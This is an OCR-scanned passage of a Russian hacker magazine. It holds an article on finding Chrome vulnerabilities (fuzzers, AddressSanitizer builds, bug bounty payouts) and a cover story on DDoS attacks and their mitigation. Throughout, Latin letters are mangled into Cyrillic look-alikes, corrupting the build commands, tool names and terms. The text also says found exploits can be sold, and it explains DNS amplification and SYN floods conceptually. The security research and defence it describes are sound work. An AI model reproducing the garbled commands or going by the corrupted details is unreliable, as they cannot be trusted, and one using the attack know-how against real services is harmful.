Да, можно найти какой-нибудь всеми забытый 
фаззер и использовать его. Но много ли будет 
проку от инструмента, которым по какой-то 
причине никто не пользуется? 
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Дополнительный вклад в оригинальность 
вносит выбор исследуемого компонента. 
Практически любой современный браузер 
представляет из себя этакий мультимегаком- 
байн — чего туда только не понапихано, чтобы 
усладить нежную душу веб-разработчика или 
дизайнера. Ни один вендор также не хочет от- 
ставать в гонке на соответствие требованиям 
ѴѴЗС, теряя из-за этого некоторую долю рынка, 
поэтому вендоры стремятся реализовывать 
в своих творениях абсолютно все современ- 
ные фичи. Тут еще, конечно же, встает вопрос 
выбора между скоростью внедрения и ценой 
за эту скорость. Как говорится, поспешишь 
— людей насмешишь. В нашем случае же 
поспешишь — багхантеров накормишь. :-) 
Ктаким фичам относятся С55 3, НТМІ_ 5, БОМ, 
5ѴС, Сапѵаз, Аисііо/Ѵісіео, ѴѴеЬСЦ Бгад'п'Бгор, 
всякие хранилища и прочее и прочее. Что ка- 
сается самого СЬготе, то там есть и собствен- 
ные разработки, например формат картинок 
ѴѴеЬР. 



ИЗУЧЕНИЕ ИСХОДНИКОВ 



В случае с опенсорсными браузерами можно 
получить исходники и искать уязвимости 
непосредственно в миллионах строк кода, 
перебирая всё подряд, или же целенаправ- 
ленно исследовать какой-либо компонент, 
допустим ХМЬпарсер. Однако этот метод 
более трудоемкий, чем фаззинг. Тут нужны 
усидчивость и желание рыться в исходниках 
часами напролет, а также уверенные знания 
С++ (их уровень должен быть не ниже, чем у тех 
ребят, которые пишут данный браузер). Я бы 
не слишком надеялся, что в коде удастся найти 
какие-либо опечатки или недочеты, хотя и это 
не исключено. К тому же где гарантия того, 
что тебя, после того как ты потратишь месяц 
на копание в коде, за пять минут не обойдет 
чей-нибудь фаззер, написанный на коленке 
за пару часов? Если уж на то пошло, то процесс 
было бы неплохо автоматизировать с помощью 
использования статических анализаторов 



кода, а только лишь после этого подключать 
голову. Но ознакомление с исходниками в лю- 
бом случае не повредит. 



ПЕРЕОТКРЫТИЕ БАГОВ 



Что значит «переоткрытие багов»? Очень 
просто — листаем старые уязвимости и про- 
веряем, насколько хорошо они исправле- 
ны. Например, уязвимость в МогіІІа Рігеіюх 
с идентификатором СѴЕ-2010-0179, позволяю- 
щая выполнять произвольный код в РігеЬид, 
была переоткрыта, после чего ей присвоили 
еще и идентификатор СѴЕ-2010-3773. Да, 
хоть и редко, но такое бывает — уязвимости, 
которую разработчик плохо исправил, при- 
сваивают еще один идентификатор. Несмотря 
на то, что таким способом много уязвимостей 
не найдешь, анализ старых багов помогает по- 
нять, где разработчики чаще всего ошибаются 
и на чем следует заострять внимание. Ктому 
же этот способ позволяет попрактиковаться 
в изучении уязвимостей на реальных примерах 
в исходниках. На баг-трекерах МогіІІа и ѴѴеЬкіІ 
полным-полно описаний уязвимостей как 
от разработчиков, так и от 10 1, так что очень 
советую туда заглянуть. Лично я регулярно 
посещаю эти злачные места. 

К методам реинкарнации жуков относится 
исследование баг-трекера или чейнджлога 
и поиск еще не исправленных уязвимостей 
в различных браузерах. Несмотря на то что 
баги, которые были признаны критическими 
с точки зрения безопасности, обычно закры- 
вают от публичного доступа, и тикет получает 
статус риЫіс только после выхода патча, 
всегда существует вероятность найти нечто 
интересное. К СЬготе, конечно, это относится 
в меньшей степени, так как команда его раз- 
работчиков очень быстро реагирует на обнару- 
женные ошибки и исправляет их. Другое дело 
ЗаІ'агі — они подолгу тянут с исправлениями, 
и поэтому есть шанс в определенный про- 
межуток времени найти уязвимость, написать 
сплойт и продать его. 



БИНАРНЫМ АНАЛИЗ И РУЧНОЙ ПОИСК 



Бинарный анализ имеет свои преимущества 
даже при наличии исходников, несмотря 
на всю его сложность. Уровень исходников 
и бинарь — это два совершенно разных 
мира. В первом случае мы оперируем более 
абстрактными понятиями, а во втором — уже 
конкретными вещами. Программист пишет 
код в соответствии со своими представления- 
ми о том, как он должен работать, а хакеры 
видят, как код работает в действительности. 
Конечно, попытка проследить логику работы 
какого-либо куска кода в ассемблере, имея 
на руках исходники, не оправдывает себя. 
Здесь имеет смысл обращать внимание 
на такие низкоуровневые процессы, как 
чтение из определенных участков памяти 
или запись в них. К тому же для оптимизации 
программы компиляторы могут менять код 
не предусмотренным программистом образом. 
В общем, то, что ты видишь, — это не то, что 
будет исполняться. Конечно, так или иначе 
придется делать бинарный анализ, но тут всё 
уже зависит от того, как ты ищешь уязвимости 
и, соответственно, с какой целью реверсишь 
бинарь. 

Ручной поиск с тестированием проводится 
в случаях, когда автоматизировать процесс по- 
иска уязвимостей сложно. Допустим, это может 
быть проверка корректной работы политик безо- 
пасности в каких-либо специфических условиях 
или при использовании новыхтехнологий, поиск 
багов, которые возникают, когда пользователь 
выполняет определенную комбинацию действий 
через интерфейс. Ну вот как такое нафаззить? 

Да никак, поэтому тут можно или чисто случайно 
найти баг, что одному ресерчеру удается не так 
часто, а можно и целенаправленно исследовать 
определенную технологию, применяя нестан- 
дартное мышление хакера. 



ТЕСТОВАЯ ПЛАТФОРМА ДЛЯ СНК0МЕ| 



Если ты собрался тестировать СЬготе, 
то не забывай, что он работает на многих 




Кажется, в СИготе нашлось переполнение кучи 
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АсШгеззБапШгег диагностирует краш 



ОСях: ѴѴіп сіоѵѵз (только 32 бита), І_іпих и Мае. 
Существует вполне весомая причина про- 
тестировать его на всех доступных тебе 
системах: какой-либо баг может не показать 
себя на одной операционке, зато успешно 
проявится на другой. Например, недавно был 
обнаружен крайне интересный баг в библио- 
теке СІ\Ш С, который проявлялся исклю- 
чительно под Линуксом ( сгЬид.сот/48733 ). 
Также попробуй протестировать максималь- 
ное количество браузеров. Одновременно 
могут стоять только сапагу и любая другая 
версия, но не беѵ, Ьеіа или зІаЫе вместе (кеш 
можно получить за версии зІаЫе, Ьеіа или 
беѵ). Таким образом, после простых расчетов 
получаем, что для фаззинга у нас есть как 
минимум 15 вариантов сборок браузера всего 
лишь от одного производителя. Это суще- 
ственно повышает шансы найти уязвимость, 
а если у тебя имеется возможность фаззить 
все это одновременно, то вообще прекрас- 
но — процесс ускоряется в разы! Можно 
исследовать готовый бинарник, а можно 
и самому собрать браузер. Последний вариант 
имеет свои преимущества, о которых я сейчас 
и расскажу. 

Соодіе СЬготе можно собрать с А5ап. 

Что такое А5ап? Это сокращение от АсИгезз 
ЗапШгег, который представляет собой еще 
один проект от гугловцев, призванный за- 
менить ѴаІдгіпсІ. Он работает гораздо быстрее 
ѴаІдгіпсІ. Если последний замедляет программу 
в десять раз, то А5ап — всего в два. Этот ин- 
струмент позволяет обнаруживатьуязвимости 
типа изе-аІТег-Ітее, оѵегЛоѵѵ/ипсІегЛоѵѵ кучи 
и стека, а также другие багги, связанные с по- 
вреждением памяти. Кроме того, А5ап находит 
больше багов, чем старый добрый ѴаІдгіпсІ. Он 



заменяет таІІосПЛгееО на свои функции, ко- 
торые «маркируют» зоны вокруг используемой 
области памяти. Затем компилятор генерирует 
код, который проверяет меченые зоны. Если 
запрошенный адрес помечен, выводится ошиб- 
ка. Советую заглянуть на сайт проекта — там 
представлено достаточно примеров, кото- 
рые позволяют понять, как работает данный 
инструмент. 

Подготовленный таким образом СЬготе 
сильно облегчает задачу определения типа уяз- 
вимости, будь то Ьеар ЬиІТег оѵегЛоѵѵ, изе-аіТег- 
ітее или что-то другое. Для этого достаточно по- 
смотреть в логи А5ап. Однако не все так просто. 
В процессе компиляции браузера потребуется 
хорошее интернет-соединение для регулярной 
синхронизации исходников, а также довольно 
мощный компьютер для сборки и последующе- 
го анализа краша. Но обо всем по порядку. 

Прежде чем приступить к делу, хочу 
сказать, что я использовал ІІЬипІи 10.10, х64 



и поэтому не могу знать об особенностях сбор- 
ки браузера на других системах. 



СБОРКА БРАУЗЕРА 



Для начала давай скачаем исходники браузера 
со страницы проекта, а затем распакуем их. 
Теперь необходимо исправить файл .деііепі, 
добавив туда следующие строки: 

"сизІіот сІерБ" : { 

"Бгс/ІіІ'іігсІ-рагІіу/аБап" : 

"ІгЕ'Ер: //бгс . сІіготіит.оп§/5ѵп/1:гипк/_ 
сІер5/1=ІіігсІ_раг1=у/а5ап" . 

Это укажет конфигуратору, что нужно ис- 
пользовать А5ап. Для сборки А5ап необходим 
СІапд ( ЫЦу/тГ7си6 ). После его установки вы- 
полняем в командной строке сценарий ./ЬиіІсІ/ 
іпзІаІІ-ЬиіІсІ-сІерз.зЬ. Этот скрипт разрешит 
нужные зависимости и наведет порядок там, 
где это необходимо. Теперь следует настроить 
переменные окружения, выполнив следующие 
команды: 

ехрогЬ РАТН=$Н0МЕ/сІеро1:_1:ооІ5 : $РАТН 
ссі БГС 

А5АМ=" рмсГ /1:ІіігсІ_раг1:ѵ/а5ап 
А5АМ_ВІМ=$А5АМ/а5ап_с1ап^_І.іпих/Ьіп 
ВІ_АСКІ_І5Т="-т11ѵт -а5ап-Ыаск1І5І:=$А5АІ\]/ 
азап ЬІаск ІІБІі.ІіхІ:" 

СС="$А5АІМ ВІІМ/ сіап^ &ВІ.АСКІ.І5Т" 

СХХ= " $А5АІ\І_В ІІ\І/с1ап§++ $ВІ_АС КІ_І5Т" 

6УР РЕР]Ж5= ' а5ап=1 Ипих ЦБе 1=сша11ос=0 
геІеаБе ехііга сЛа^5="-^ -01 -Тпо-іпііпе- 
ТипсІііопБ --Рпо-іпііпе" ' §с!іеп1: гипІіоокБ 

Команда для сборки самого браузера вы- 
глядит вот так: 

таке -І16 ВІЯІ.РТУРЕ=Ке1еа5е СС="$СС" \ 
СХХ="$СХХ" СС. 11051=" $СС" \ 
СХХ.Іі 05 І=="$СХХ" І_ІІМК.Іі 05 І:="$СХХ" сііготе 

На моем компьютере сборка заняла меньше 
часа. Но, как уже было упомянуто выше, этот 
процесс весьма требователен к конфигурации, 
поэтому советую выделить не меньше 50 Гб 
на жестком диске, как минимум 12 Гб опера- 
тивной памяти и использовать мощный про- 
цессор, чтобы сборка не затягивалась. 



ТОП-5 ИССЛЕДОВАТЕЛЕЙ 6006І_Е СНРЮМЕ 

1. СЕРГЕЙ ГЛАЗУНОВ (54 уязвимости) 
2* МІАІІВІ2 (49 уязвимостей) 

3* АКІ Н ЕЬІ N (24 уязвимости) 

I , КІІ2СС (22 уязвимости) 

5, СНВІ5ТІАЫ НОИЕК (19 уязвимостей) 
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ИЩЕМ БАГИ 



Если браузер собрался успешно, то запускаем 
его с такими параметрами: 

А5АІ\І_0РТІ0І\І5=5І:а1:5=1 ои1:/Ке1еа5е/сІіготе 
--по-запсІЬох 2>&1 | і:И і псІ_ра г1:у/а за п/ 
5сгір1:5/а5ап_5утЬо1І2е. ру | с+н-611; 

Браузер запустится без песочницы, все 
ошибки будут перенаправлены на вход специ- 
ального фильтрующего скрипта, который 
отвечает за символы. Имей в виду, что утилита 
асісі г21іпе, которую использует этот скриптом, 
пожирает огромное количество памяти во 
время работы (у меня на нее уходило вплоть 
до 9 Гб). В принципе, совсем необязательно 
запускать браузер вместе с парсерами и ин- 
струментами для сборки статистики, можно 
запустить и так: 

ои1:/Ке1еа5е/сІіпоте --по-запсІЬох 

Теперь, когда ты научился правильно со- 
бирать тестовую платформу, настало время 
выбрать способ для поиска багов. По понятным 
причинам я не буду приводить здесь конкрет- 
ные рецепты по багхантингу и перечислять 
соответствующие мануалы, но для начала 
посоветую остановиться на фаззинге и выбрать 
правильный софт (если, конечно, ты все-таки 
не захотел или не смог использовать свои 
собственные наработки). На данный момент 
доступно несколько достойных внимания 
публичных фаззеров браузеров: сгозв^игг, ге1_ 
\ии, Сапѵаз I : ииег от МісЬаІ ^аіеѵѵвкі, )5ІипІи22 
от Зеззе Рибегтапп, ВР от Зегету Вгоѵѵп. У всех 
перечисленных фаззеров разные принципы 
работы: фаззинг йОМ, мутирование НТМІ_- 
документа, фаззинг грамматики ЗаѵаЗсгірІ, 
фаззинг сапѵаз и ѴѴеЬ6І_. Большая часть этих 
фаззеров отработала свое и вряд ли сможет 
найти новые уникальные уязвимости — всё 
требует доработки. Но разработчики браузеров 
продолжают развивать некоторые фаззеры, на- 
пример )5ІипІи22. Подробно описывать каждую 
из перечисленных программ было бы неце- 
лесообразно, так что советую просто взять их 
с нашего диска и самостоятельно попробовать 
в деле. 




РіѴИійИК Пчоттк НЦЧЙ № гтту 
сгш1Ык:І*ш1ин татар? пчріІтІ.тт 
кггЬгЗ ЬЩ п1кУ!«^.1_игЫу * пгіі ШпгЬжт 
ДвміЧ ЪіТі'г іЫі І-ітіІ. 



II? 



Ресерчеры недовольны правилами Рѵѵп20\лт 



Г#77 е ы * врфид'яаоов’»':іі а* л 




ѴѴіпйЬд схватил назойливый Біаск оѵегЛоѵѵ в СЬготе 

Вернемся к нашему браузеру. После выхода 
новой сборки ты можешь обновить исходники 
с помощью команды «./дсііепі зупс». Затем 
следует повторить вышеописанные операции 
для поиска багов. Чтобы не вводить каждый 
раз все команды при обновлении браузера, 
я использую простой ЬазЬ-скрипт, который 
можно также найти на диске. Однако далеко 
не всегда полезно синхронизироваться, за- 
частую лучше проверить состояние проекта 
на странице ЫЕ1 у/59уу1:5Г . Если вверху висит 
статус Ореп, то можно качать сорцы, если 
СІозесІ, то СЬготе может и не собраться. 
Информацию эта страница получает от ботов, 
которые регулярно в автоматическом режиме 
собирают браузеры в разных системах. 

Вероятно, тебя интересует, каковы шансы 
найти уязвимость в таком браузере, как 
СЬготе. Так вот, эти шансы весьма и весьма 
неплохи. За одну неделю фаззинга в СЬготе 
мне удалось найти четыре уязвимости: одну 
йо5 и три типа изе-аіТег-ітее. В то время я 
фаззил без А5ап, поэтому предполагаю, что 



вполне могупустить часть уязвимостей из- 
за сложности анализа или нехватки времени. 



ЖУК ПОЙМАН, ЧТО ДАЛЬШЕ? 



Итак, допустим, ты нашел баг в СЬготе. Не спе- 
ши сразу же о нем сообщать! Из обычного 
бага можно выжать гораздо больше, чем если 
просто раскрыть разработчикам свой РгооІ- 
оІ'-СопсерЕ Тут есть масса нюансов, о которых 
нужно обязательно рассказать. Для начала 
необходимо понять, является ли обнаруженный 
баг настоящей уязвимостью или нет. 

В принципе, на странице проекта указано, 
какие именно баги не являются уязвимостями: 
йо5, 00М — баги истощения памяти, Зіаск 
ехЬаизІіоп — истощение стека (например, 
когда функция попала в рекурсию). На всё 
остальное — переполнение буфера или кучи, 
изе-аІТег-Ітее и прочие известные нам баги — 
следует обращать внимание. Если из-за йо5 
падает весь браузер, то ее стоит пометить как 
Зесигііу (в багтраке такой баг будет помечен 
как некритичный). Но большинство багов — это 
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действительно только баги, поэтому, особенно 
если долго занимаешься багхантингом, пере- 
стаешь радоваться при виде очередного «Аѵѵ, 
5пар!». Иногда СЬготе принудительно убивает 
процесс, чтобы избежать всяких неприятностей 
типа истощения памяти. Самая популярная уяз- 
вимость среди браузеров — это изе-айег-ітее, 
попытка использовать указатель на память по- 
сле того, как ее уже освободили. Баги повреж- 
дения памяти хорошо ловить инструментами 
типа ѴаІдгіпсІ или А5ап. Это быстро и удобно, 
но можно, конечно, использовать и отладчик 
дбЬ или ѴѴіпБЬд. Под виндой я использую 
ѴѴіпОЬд — все нужные символы доступны с сер- 
вера проекта. И сразу предупрежу начинающих 

— если в стеке вызовов содержится много 
строк типа РеІаипсЬСЬготеВгоѵѵ5егШЬІ\ІеѵѵСо 
ттапсіипеІШеесІесІ, то это значит, что с симво- 
лами непорядок, их нужно перезагрузить: 

! Бут П0 І5Ѵ 
. геіоасі /сі /-Р /о 

Послетого какты определил, что некий баг 

— это не просто краш таба, а самая настоящая 
уязвимость, можешь отсылать отчет. А можешь 
и не отсылать. Дело в том, что оценка твоей 
уязвимости напрямую зависит оттого, на- 
сколько ты облегчишь жизнь разработчикам. 
Чем проще понять, в чем суть бага, тем бы- 
стрей его исправят. В противном случае про- 
цесс выпуска релиза затянется, а ты не скоро 
получишь свой кеш. Образец, который ты 
собрался посылать, должен быть максимально 
урезан и содержать только то, что крашит таб 
или браузер. Так легче локализовать баг и по- 
нять, что именно вызывает краш. Да и отладка, 
конечно же, ускоряется и упрощается. Итак, 
красивый сэмпл есть, но к нему необходимо 
еще и описание. Без излишних эмоций и ли- 
рики нужно описать то, как заставить образец 
крашить браузер. Или же, если там всё и так 
ясно, можно просто написать, что при загрузке 
приаттаченного файла происходит то-то и то- 
то. Ну, или не файла, всё зависит оттого, что 
ты нашел. Лучше всего, если ты сам понял суть 
бага и можешь четко и грамотно описать, где 
находится проблемный участок кода. Это еще 
один шанс повысить вознаграждение и изба- 
вить разработчиков отлишней работы. Реаль- 
но качественный отчет от СЬгіб РоЫІ" оценили 

в целую штуку, хотя он и касался бага, который 
создает среднюю угрозу. Не знаю, что тут еще 
добавить, видимо, стоит просто открыть и по- 
читать этот сабмит по адресу сгЬиа.сот/63866 . 
Однако здесь не стоиттянуть время, так как 
кто-нибудь может описать уязвимость раньше 
тебя. Однажды такое произошло и со мной. 
Сейчас я пишу эти строки, а чуть раньше 
на мой ящик пришло сообщение, что новая 
уязвимость, о которой я сообщил, является 
дубликатом. Уязвимость тянула на критиче- 
ский уровень. К сожалению, я опоздал всего 
на пару дней, и кеш получил человек, первым 
сообщивший о баге. Такие дубликаты сливают 
(делают тегде] с ранее обнаруженной уязви- 
мостью. Да, обидно, но ничего не поделаешь 



— не в первый и не последний раз, есть куча 
других жуков, которые скучают по нам. 

И вот, наконец-то, мы сообщили о сво- 
ей первой уязвимости, сидим и ждем. Нет, 
не ждем, а продолжаем искать другие уяз- 
вимости. Обычно на сообщение реагируют в те- 
чение суток, затем констатируют критичность 
уязвимости и подтягивают соответствующих 
разработчиков, которые начинают процесс 
устранения бага и разработки патча. 



ПОЛУЧЕНИЕ КЕША 



Это одновременно и приятный, и муторный про- 
цесс. Точных сроков получения вознаграждения 
не существует, так как всё зависит от того, 
на каком этапе планирования релиза браузера 
ты отправил сообщение о баге, а также оттого, 
что он собой представляет. Бываеттак, что 
уязвимость, которую ты нашел, не так-то просто 
исправить, ошибка может затрагивать сразу 
несколько компонентов и требовать от раз- 
работчика тщательной проверки. Теперь пред- 
положим, что тебе уже пообещали выплатить 
определенную сумму. Вернее, в баг-трекере 
указали лейбл, например геѵѵагсІ-500. Ты 
также увидишь стандартный текст (Воііегріаіе 
Іехі) с предупреждением о том, что до выхода 
исправления нежелательно разглашать под- 
робную информацию об уязвимости, иначе это 
может привести к невыплате вознаграждения. 
Затем тебе нужно дождаться, когда с тобой 
свяжется СЬгіб Еѵапз и сообщит о дальнейших 



действиях — он дает ссылки на форму, которую 
нужно заполнить, чтобы стать подрядчиком 
Боодіе. Ужасная форма, я тебе скажу. Во- 
первых, она на английском, что, может, не так 
уж и страшно, во-вторых, там присутствует 
множество полей, которые не так-то просто за- 
полнить. К тому же, если ты не гражданин США, 
то тебе придется заполнить еще и специаль- 
ный РОР-файл, отсканировать его и отправить 
по мылу. В этих формах следует указать инфор- 
мацию о реквизитах твоего банковского счета 
и некоторую другую персональную информацию 
вроде почтового адреса, телефона и т. д. Затем, 
в зависимости от того, насколько быстро ты 
справишься и когда отреагирует человек, кото- 
рый управляеттикетами, тебя примут в систему 
Боодіе. Заполнять больше ничего не понадо- 
бится. Через какое-то время после регистрации 
тебе сообщат, что деньги находятся в системе 
перевода. 



ДОМАШНЕЕ ЗАДАНИЕ 



Надеюсь, мне удалось заинтересовать тебя ре- 
серчем Боодіе СЬготе, ведь НаІІ о{ Рате всегда 
ждет новых исследователей. Для начала посети 
баг-трекер Хрома — обещаю, что там не соску- 
чишься. На баг-трекере можно найти и полезные 
комментарии от команды безопасников, и ана- 
лиз уязвимостей, и немало смешных перлов 
от пользователей. Полагаю, я привел достаточ- 
ное количество аргументов, чтобы мотивировать 
тебя на поиски уязвимостей в Боодіе СЬготе. НС 
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СОѴЕК 5Т0РѴ 




Атаки появились на заре интернета. Невоз- 
можно сказать, когда возникла такая услуга, 
как ББоЗ, — это тайна, покрытая мраком. 

Не скажешь ведь: «Я был первым, кто заказал 
атаку в 1998-м!» 

Знакомство с Б0о5 для меня лично началось 
во время проекта ІТ Теггііогу в 2003 году, 
когда игра только стартовала. Она имела до- 
статочно агрессивную рекламную кампанию, 
в ответ на которую тут же прилетел 0Бо5 
от конкурентов. Скажу честно, я растерял- 
ся. Больше всего из-за того, что компания, 
которая оказывала хостинг-услуги, не просто 
не смогла, а не пожелала бороться с атакой. 
Ее представители сказали, что это не их про- 
блема. 

Буквально за ночь мы переосмыслили 
структуру приложения и перестроили его. 

Ресурс поднялся, но атака перестала рабо- 
тать на уровне приложения. Злоумышленники 
перевели атаку на сетевой уровень, в резуль- 
тате чего отключилась вся сеть компании, 
предоставляющей хостинг. Тогда уже она 
пришла к нам с просьбой сделать что-нибудь. 
На вопрос «а что сделать-то?» последовал 
ответ: «Ну договоритесь как-нибудь, вы же 
знаете, кто вас атакует». Мы, естественно, 
не знали и договориться не могли. Да и как 
договариваться с террористами? 

Компания, которая, казалось бы, должна 
заботиться о клиентах, не сделала ничего. 
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БОРЬБАС ОБОЗ-ОМ ГЛАЗАМИ НІ6НШАБ БАВ 



И не потому, что она плохая и хостинг некаче- 
ственный, а потому, что она не могла ничего 
сделать. 

Самые популярные ОБоБ-атаки — это, 
конечно, атаки, организованные с помощью 
ботнетов. Это доступный способ сделать атаку 
распределенной. 

Стоимость атаки сильно зависит от того, как 
она реализуется. Исполнителем может вы- 
ступать студент, который сам что-то написал 
и готов поработать за пиво, а может и органи- 
зованная группировка. 

Есть типы атак, которые могут стоить, 
по слухам, полмиллиона рублей и больше. Мы 

выделяем атаки базового типа: до пяти тысяч 
ботов, проведение на уровне приложения, 
одна стратегия. Для исполнителя тут нет ни- 
чего сложного — получил ѴѴМ 1, нажал кнопку, 
пошел пить пиво. Это стоит примерно $30-100 
в сутки. Но есть и атаки другого рода, когда 
видно, что работает команда, и работает она 
24/7 — на результат. Если у нее не получается 
добиться результата, она постоянно пере- 
ключает режимы атаки, меняет стратегию, 
пытается найти уязвимое место и прорваться. 
Конечно, такое стоит далеко не $100 в сутки. 

Россия выделяется среди других стран гораз- 
до более изощренными атаками. Европейцы 
в шоке оттого, насколько сложны наши атаки. 
Например, к нам недавно обратилась одна 
компания, которая работает на российском 



рынке, но все ее информационные структуры 
расположены в одном из ведущих европейских 
дата-центров. Когда компания к нам обрати- 
лась, дата-центр испытывал серьезные про- 
блемы и был недоступен. Мы подготовились 
к приему компании на своей сети и прогрели 
карантинное оборудование, ожидая чего-то 
экстраординарного, ведь дата-центр «умер»! 
Каково же было наше удивление, когда мы 
увидели, что, хотя атака проводится на уровне 
выше среднего, она не представляет собой 
ничего особенного. 

Законодательство крайне слабо в вопросах 
привлечения к ответственности за ББоБ, 

из-за чего злоумышленники чувствуют себя 
фактор безнаказанными. Для квалифициро- 
ванного программиста проведение ББо5-атак 
на заказ становится абсолютно безопасным 
прибыльным делом, доход от которого может 
превышать текущие зарплаты на рынке в де- 
сятки раз. 

Мотивы для ББоБ — это, как правило, деньги 
и просто личная неприязнь. Бе ЫЫо мы живем 
в информационном обществе. Скорость рас- 
пространения информации влияет на него 
прямым образом. Заблокировав источник 
информации, можно необратимо повлиять 
на общество. Соответственно, ББоЗ — это эф- 
фективное средство блокировки какого-либо 
источника информации на необходимое время. 

В качестве примера можно привести сайт 
БІоп.ги. Сайт работал, всё грузилось, но атака 



не спадала. Такие атаки называют комбиниро- 
ванными. Когда они к нам пришли, она велась 
на сетевом уровне, на полосу. Когда злоу- 
мышленники увидели, что заполнение полосы 
вообще не дает результата, началась атака 
арріісаііоп-уровня. В ботнет, использовавший- 
ся для проведения атаки, входило порядка 
200-270 тысяч ботов. 

Наиболее подвержены ББоБ-атакам доста- 
точно узкие направления интернет-бизнеса 
с высокой конкуренцией. Хороший пример — 
пиратские клоны Ыпеаде II. Такие сервисы — 
вообще отдельная история, ведь они являются 
чисто коммерческими. Если в два часа ночи 
к тебе в ІСБ стучится кто-то и, допустив восемь 
орфографических ошибок в четырех пред- 
ложениях, требует (!), чтобы ты немедленно 
ему помог, можно не сомневаться, что это он! 
Администратор пиратки Ыпеаде! 

ББоБ-атакам подвергаются и те сайты, где 
трудно их ожидать. У нас, например, есть 
такой внутренний мем — «кедровые бочки». 
Онлайн-магазин, который, не поверите, про- 
дает кедровые бочки, подвергся серьезной 
ББоЗ-атаке. Это очень узкий, высококонку- 
рентный вид деятельности, которая, видимо, 
приносит хорошую прибыль. 



[ТЕХНИЧЕСКАЯ СТОРОНА 0005 



Зачем вообще нужно классифицировать ата- 
ки? Чтобы понять, разложить по полочкам их 
механизм работы и предпринять адекватные 
контрмеры. 
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Наши коллеги по цеху пытаются как-то клас- 
сифицировать атаки. На одном сайте можно 
найти и ІСМР зрооГ и 0145 атрПЛсаЛоп, и ТСР 
5ѴІЧ ЛоосІ, ТСР Р5Т ЛоосІ — парни перечисляют 
техники проведения атак. Много страшных 
букв, которые для обычного пользователя ни- 
какого смысла не несут. Такая классификация 
нас не устраивает. 

Мы классифицируем атаки очень просто: 

атаки на приложения, атаки на канальную 
полосу (скорость измеряется в гигабитах/с), 
атаки на сетевую инфраструктуру (скорость из- 
меряется в пакетах в секунду), атаки на транс- 
портный уровень (стек ТСР/ІР). 

Самая мякотка — это уровень приложения. 
Почему? Потому, что у атак уровня приложения 
плечо максимально. Плечо атаки — это отно- 
шение ресурсов, необходимых на стороне ата- 
кующих, к ресурсам, необходимым на стороне 
приложения (на стороне защищающихся). 

Возьмем какой-нибудь средний интернет- 
магазин. Можно найти ссылку, обычную ссыл- 
ку, определенное количество обращений в се- 
кунду к которой убьет этот магазин напрочь. 
Таких приложений много, и для того чтобы их 
убить, иногда и ботнет не нужен — достаточно 
сотового телефона даже не с ЕйбЕ, а с 6РР5. 
Четыре-пять запросов в секунду, и приложение 
выкидывается в оиШоѵѵ и не может выйти отту- 
да до перезагрузки сервера. Этим обусловлена 
популярность атак на уровне приложений. 

Еще есть транспортный уровень — атаки, на- 
правленные на сам стек ТРС/ІР. К этому типу 
относятся атаки типа БѴІМ-флуд, Н5Т-флуд или 
РІІЧ-ѵѵау — модная сейчас атака с некоррект- 
ным закрытием соединения, которая, кстати, 
тоже эксплуатируетуязвимость спецификации 
протокола, а не реализации. 

К наиболее популярным методикам относится 
□N5 атрІіНсаІіоп. Достаточно найти любой 
сетевой сервис ЮР ЬазесІ без ЬапсІзЬаке, 
послать пакет размером N с фальсифициро- 
ванным источником и в ответ получить пакет N 
х К. В таком случае для реализации распреде- 
ленной атаки нужно иметь список ІР-адресов, 
на которых есть эти сервисы, один очень 
хорошо подключенный сервер на гигабите, 
который выдаст набор пакетов в эти «отра- 
жатели» с поделанным ІР-адресом жертвы. 
Пакет отправится к жертве и снизит до нуля ее 
пропускную способность и выведет ее из ра- 
бочего состояния. Речь идет о сервере 0145 
— ІЮР 53, где можно сделать такую штуку, как 
рекурсивный запрос по зоне. Сам по себе он 
небольшой, а вот ответ на него будет длинным. 
Чтобы дополнительно увеличить коэффициент 
К атаки, достаточно «подкормить» эти сервера 
каким-нибудь большими фальшивыми домен- 
ными зонами. Получая их рекурсивно, с под- 
дельным адресом жертвы, можно увеличить К 
в разы. Второй вариант — это ІЧТР, протокол 
синхронизации времени, который тоже имеет 



уязвимости подобного рода при плохо сконфи- 
гурированных серверах. 

Атака типа БѴІЧ-флуд появилась одновременно 
с ТСР-протоколом. Первое упоминание о ней я 
встретил, по-моему, в 1982 году. Как ни странно, 
она эффективна по сей день. История разви- 
вается по спирали. Сто-пятьсот 5УІ\І-запросов 
в секунду — это, конечно, этап давно пройден- 
ный. В настоящее время при наличии достаточ- 
ных процессинговых мощностей можно легко 
превзойти и цифру в 10 млн пакетов в секунду. 

В момент отправки пакета с запросом 
на соединение партнер должен сгенерировать 
зеяиепсе-номер (а это требует вычислений, так 
как он должен быть случайным, криптостойким 
числом) и создать в своем стеке определенною 
запись. На это нужны ресурсы, ресурсы и еще 
раз ресурсы. На то, чтобы послать пакет, сге- 
нерировав его трафик, требуется существенно 
меньше ресурсов, чем на действия, выполняе- 
мые на стороне сервера. Получаем плечо атаки. 

Проблема существует внутри самого протоко- 
ла, в его спецификации. Когда разрабатывал- 
ся ТСР/ІР-стек, никто не думал, что интернет 
разрастется до таких масштабов по количе- 
ству узлов, достигнет таких скоростей и, что 
немаловажно, будет прокачивать через себя 
столько денег. 

Существуют атаки, которые не используют 
ботнеты. Распределенную атаку можно про- 
вести и с помощью механизма отражения. 
Классика жанра — атаки 0145 атрПЛсаЛоп 
с отражением и увеличением мощности. 

Атаки на инфраструктуру затрагивают всё, 
что лежит вокруг сетевой инфраструктуры: 
протоколы маршрутизации и само оборудова- 
ние, если менеджмент-модули имеют откры- 
тый ІР-адрес. 

Что такое атаки на сетевом уровне? Просто 
залить полосой в 56 Гбит — это сіизіегу зогі 
называется. Это последнее средство, когда 
ничего уже не помогает. Такие атаки очень до- 
роги и чрезвычайно разрушительны не только 
для самой жертвы, но и для всех, кто «стоит 
рядом». Как правило, они не могут продол- 
жаться дольше двух-трех суток, так как начи- 
нают доставлять проблемы даже источникам 
атаки — сетям, с которых она производится. 

Базовые атаки, совершаемые с помощью 
ботнетов, которые насчитывают около 200 
ботов и ничего, кроме «деі корень», не умеют, 
в принципе не должны представлять собой 
проблему для грамотно написанного ресурса. 



|0 ЗАЩИТЕ ОТ РР05| 



От любой атаки можно защититься. Мы в этом 
не сомневаемся. 

Обычно, когда на клиента начинается ОБоБ- 
атака, хостер не находит ничего умнее, чем 



просто отключить его, так как боится, что по- 
лягут и другие его клиенты. 

Когда к нам приходит клиент, мы объясняем, 

что ему необходимо перевести 0145 на наш 
ІР-адрес (которой мы ему выделяем). Также, 
чтобы избежать атаки на прямой ІР клиента, 
который уже засвечен в сети, необходимо его 
как минимум поменять, а как максимум — по- 
менять этот ІР и дополнительно скрыть с по- 
